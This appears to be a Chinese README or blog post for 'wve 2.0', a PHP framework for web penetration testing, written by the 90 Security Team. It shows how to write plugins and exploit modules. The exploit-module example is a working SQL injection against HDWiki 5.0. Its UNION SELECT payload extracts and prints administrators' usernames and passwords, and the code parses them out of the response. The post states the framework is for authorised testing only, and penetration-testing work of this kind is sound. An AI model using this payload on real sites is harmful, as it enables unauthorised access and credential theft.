#web vuln exploit payload 2.0 版本

简称wve,是一个以php开发针对web渗透测试的一个框架平台,本版本对于1.0,1.5 之前代码是完全重写,而且更注重与扩展性,便携性,使用sqlite数据库临时储存数据。

框架内置7条命令,用于实现一些基本操作,也支持自定义命令,或者说是插件(扩展)。下面简单说下扩展插件以及exploit模块的编写

#扩展插件的编写:

注意:文件命名规范 扩展名称(也是命令名称)加上_plus.php

类名与扩展名称相同,扩展最终执行方法名必须命名为run

定义help方法后会现在在内置命令help中显示。

#范例:

\wve\model\plus\test_plus.php

<?php  
class test{ //类名与文件名(命令名称)必须相同   
public function help(){ //定义help方法 用于显示在内置help命令中   
return 'test 帮助信息';   
 }   
public function run(){ //定义run方法 用于插件的运行   
msg('test模块执行扩展执行成功');   
 }   
}   
?>   

测试效果:

wve--> help

|---------------------------------------------------------------------------|

| [ ] help 帮助命令

| [ ] search 搜索命令

| [ ] options 查看设置选项

| [ ] set 设置选项参数

| [ ] join 加载模块

| [ ] run 执行模块

| [ ] show 模块列表

| [ ] Plus:

| [ ] test 帮助信息

|---------------------------------------------------------------------------|

wve--> test

|---------------------------------------------------------------------------|

| [ ] test模块执行扩展执行成功

|---------------------------------------------------------------------------|

wve-->

可以看到内置的帮组命令中已经显示出来了

| [ ] test 帮助信息 这个扩展的命令帮助

test 命令输入后也显示

test模块执行扩展执行成功

说明我们的扩展已经成功调用。

关于exploit模块的编写:

注意类名必须与模块名称相同 必须定义info函数,用于显示模块信息以及模块设置信息。

数组名info 为模块信息 数组名option 为模块执行参数设置信息

下面以hdwiki 5.0版本的在注入漏洞来编写范例

\wve\model\exploit\hdwiki5injection.php

<?php   
class hdwiki5injection {   
public function info(){ //定义info 方法返回数组信息   
$info=array(   
 'info'=>array( //info 数组定义模块相关信息   
 'author'=>'admin', //作者信息   
 'title'=>'测试模块', //模块名称   
 'info'=>'这是一个测试模块嘿嘿' //模块简介   
 ),   
 'option'=>array( //模块参数信息设置   
 'host'=>'127.0.0.1', //host初始化值127.0.0.1  
 'path'=>'/',   
 'id'=>'0',   
 'pre'=>'wiki_',   
 'port'=>'80'   
 )   
 );   
return $info;   
}   
public function run(){ //模块运行函数 msg("HOST => ".G('host'),1); // 使用G函数来或许命令中设置参数的值   
$data=HTTP::GET(G('host'),G('path').'/index.php?doc-summary-x%27%20and%201=3%20UNION%20SELECT%201,2,3,4,5,concat%280x7776657E,username,0x3D,password,0x277E%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20'.G('pre').'user%20where%20groupid=4%20limit%20'.G('id').',1%23'); if(strpos($data,'wve~')!== false){ preg_match('/wve~(.*)\'~/', $data, $arr); $result=explode("=",$arr[1]); msg('Exploit Success',1); msg('username:'.$result[0],1) msg('password:'.$result[1],1); }else{ msg ('Exploit Failed',1); }   
}   
}   
?>   

注:wve并非工具而是框架平台

该框架版权所有 90 Security Team

框架只能用于安全人员进行授权的安全检测,请勿用于非法活动

wve 2.0框架现全部由落叶完成,希望大家也能参与到该框架的开发当中,项目地址:https://geakit.com/Security_Team/wve ,源码、程序已全部放出。

虽然落叶投入了很多精力在wve的开发中,但是难免个人能力和精力有限,wve还有很多不完善之处。

框架的开发包括:

1.功能完善

2.性能优化

3.插件开发

4.插件移植

5.框架测试

希望有能力和精力的人能加入wve的完善之中,尤其是插件的开发和移植之中,也希望大家能多多提供一些好的php插件源码,方便开发人员进行移植,当然直接移植成wve插件更好

项目地址: https://geakit.com/Security_Team/wve


评论区:
MythHack: 回复@misslulu1984:? [2012-09-29 00:50:37]
 

misslulu1984: 在吗 [2012-09-28 17:21:01]

 

Comments
Write a Comment